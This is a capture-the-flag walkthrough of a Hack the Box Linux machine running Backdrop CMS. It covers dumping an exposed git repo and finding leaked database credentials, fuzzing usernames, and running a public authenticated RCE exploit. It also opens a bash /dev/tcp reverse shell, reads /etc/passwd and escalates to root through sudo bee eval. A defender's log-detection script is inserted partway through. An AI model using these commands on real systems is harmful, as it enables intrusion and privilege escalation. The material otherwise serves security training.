Hack the Box Linux machine.
Start enumeration with rustscan and pass the results to nmap, which will run script, version, and OS scans.
rustscan -a 10.129.77.234 --ulimit 5000 -- -A


Identified a hidden git repo and that the target is using Backdrop CMS.
Install git-dumper and dump the repo into our pwd.
pipx install git-dumper # installs git-dumper in its own virtualized environment.
git-dumper http://10.129.77.234/.git .

This downloads a lot of files. Looking at the files we got, we have a settings.php file. These config/settings files are always very important, as they can reveal credentials, tokens, and paths in the server's directory structure that we may not otherwise know about or pick up. In this case, it revealed that there is a mysql instance that we can access internally, and we got the credentials to connect.

MySQL Creds.
We can attempt to use these on a login page, but we need to find one first. I notice that our nmap scan found a robots.txt file. We can curl that and see what the admin does not want web crawlers to find.
curl http://10.129.77.234/robots.txt

PHP uses query parameters to call the main index page and then fetch the file specified. It seems ?q= is the parameter that is grabbing the login page.
curl http://10.129.77.234/?q=user/login

The title confirms this is a login portal where we can try the credentials gathered from the git repo.

Our credentials do not work, but we do get an error message: “Sorry, unrecognized username”.
I tested default creds, but they did not work. We need to gather information on possible usernames, and hopefully password reuse applies here since we do have a password. The home page shows a possible username, dogBackDropSystem, but it did not work.

We can see, though, that the username is a valid user. We either need to find a password for this user or find more usernames that the password from the git repo can apply to. Typically, in these CTFs, the usernames can be found on the home page or within a directory. The directories identified in robots.txt do not have any valuable information.
We can try directory busting to see if there are any directories/files that may have username/password information.
gobuster dir -u http://10.129.77.234 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
gobuster dir -u http://10.129.77.234 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30

Not much here.
We need to look at other paths to scrape usernames. In OSINT, there are tools that scrape social media profiles. This may be possible as well in this CMS that we know is installed. Checking GitHub, we do find a repo that has a script that can list valid usernames. Let’s test it.

python BackDropScan.py --url http://10.129.77.234/?q=accounts --userslist /usr/share/seclists/Usernames/Names/names.txt --userenum

It hangs every time and gives us no output. I’ve tried different variations/paths for this, and all of them hang.
Looking at the source code, we can see what the script is trying to do and what it is targeting.

It looks like it is using a GET request to query /?q=accounts and it is fuzzing the username with our specified username list.
We can fuzz these usernames with the ffuf tool.
ffuf -w /usr/share/seclists/Usernames/Names/names.txt -u http://10.129.77.234/?q=accounts/FUZZ

This did work, and we do have more names.
Testing for password reuse, the user tiffany has administrative access.
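As an added defender-side example (not part of the original writeup), this Python script runs over constructed access-log lines and flags the two traffic patterns the walkthrough relies on: fetching the exposed .git directory, and probing many /?q=accounts/<name> URLs from one source. The combined log format, the sample lines, and the enumeration threshold are assumptions.

```python
import re
from collections import defaultdict

# Assumed Apache/nginx "combined" access-log layout; adjust LOG_RE for other formats.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
ACCOUNT_RE = re.compile(r"/\?q=accounts/([^/?&]+)")  # Backdrop user profile route

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines, enum_threshold=5):
    """Return {ip: [findings]} for the two patterns this walkthrough relies on:
    requests under /.git/ (repository dumping) and many distinct
    /?q=accounts/<name> lookups from one IP (username enumeration)."""
    git_hits = defaultdict(int)
    probed_names = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # skip lines that do not match the log format
        if rec["path"].startswith("/.git/"):
            git_hits[rec["ip"]] += 1
        m = ACCOUNT_RE.match(rec["path"])
        if m:
            probed_names[rec["ip"]].add(m.group(1))
    findings = defaultdict(list)
    for ip, count in git_hits.items():
        findings[ip].append(f"git-repo-access:{count}")
    for ip, names in probed_names.items():
        if len(names) >= enum_threshold:
            findings[ip].append(f"user-enum:{len(names)}")
    return dict(findings)

# Constructed sample log: one scanner dumps .git and probes account names; a normal visitor views one profile.
SAMPLE_LOG = [
    '10.10.14.160 - - [03/Nov/2024:10:00:01 +0000] "GET /.git/HEAD HTTP/1.1" 200 23',
    '10.10.14.160 - - [03/Nov/2024:10:00:02 +0000] "GET /.git/config HTTP/1.1" 200 92',
    '10.10.14.160 - - [03/Nov/2024:10:05:00 +0000] "GET /?q=accounts/aaron HTTP/1.1" 404 512',
    '10.10.14.160 - - [03/Nov/2024:10:05:00 +0000] "GET /?q=accounts/abby HTTP/1.1" 404 512',
    '10.10.14.160 - - [03/Nov/2024:10:05:01 +0000] "GET /?q=accounts/alan HTTP/1.1" 404 512',
    '10.10.14.160 - - [03/Nov/2024:10:05:01 +0000] "GET /?q=accounts/alex HTTP/1.1" 404 512',
    '10.10.14.160 - - [03/Nov/2024:10:05:02 +0000] "GET /?q=accounts/tiffany HTTP/1.1" 200 3104',
    '192.0.2.10 - - [03/Nov/2024:10:06:00 +0000] "GET /?q=accounts/tiffany HTTP/1.1" 200 3104',
    '192.0.2.10 - - [03/Nov/2024:10:06:05 +0000] "GET /?q=user/login HTTP/1.1" 200 2210',
    'not an access-log line',
]
```

Calling analyze(SAMPLE_LOG) reports only the scanner IP, with both a git-repo-access and a user-enum finding; the single profile view from the other IP stays below the threshold.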

We can check for public CVEs. This is the one I came across that worked for me after failing with another one: GitHub – rvizx/backdrop-rce: Backdrop CMS 1.27.1 Authenticated Remote Code Execution (RCE) – PoC Exploit

Run the exploit.
python3 exploit.py http://10.129.77.234 tiffany BackDropJ2024DS2024

Module error: a Python dependency is missing.
We can install this module.
apt search requests-toolbelt
apt install python3-requests-toolbelt

Should be good now.
Run again.
python3 exploit.py http://10.129.77.234 tiffany BackDropJ2024DS2024

It says root@10.129.77.134. I thought we were done, but we are actually the user www-data.
Getting a reverse shell would be better, so we can set up a listener and run a revshell payload.
# kali
nc -nvlp 9001
# Target
bash -c 'bash -i >& /dev/tcp/10.10.14.160/4444 0>&1' # the IP and port here must match the listener

This is more stable.
The credentials we found for mysql in the git repo belonged to a root user. There is always a possibility of password reuse, so we can check the users on the system and test the password against root and the others we can find.
cat /etc/passwd

Users: root, johncusack, and jobert.
We can attempt to log in with ssh. I tested password reuse against all the users, and we get access with johncusack. The first thing I like to check is whether the user has sudo permissions that we can use to priv esc.
ssh johncusack@10.129.79.234
# enter passwd

We can use the binary bee as a superuser.
I like checking GTFOBins for a quick reference.

No luck.
A quick Google search, with some help from AI, and I found this:

Easy enough. I want to check what the eval argument is first.
/usr/local/bin/bee -h | grep -A 1 "eval" # The -A flag tells grep to print the matching line AND the next N lines

So it allows us to execute PHP code. It also shows that the php: portion of the AI response is not required. The other thing is I am not sure what “after bootstrapping Backdrop” is referring to. Let’s test the command and debug from there.
sudo /usr/local/bin/bee eval 'system("/bin/sh");'

That bootstrap is an issue. Looking into it, I found this.

If it is looking for the “initial content and configuration”, I assume that means the root directory of the Backdrop install.
We can add the root directory and continue from there.
sudo /usr/local/bin/bee --root=/var/www/html eval 'system("/bin/bash");'

Pwn3d!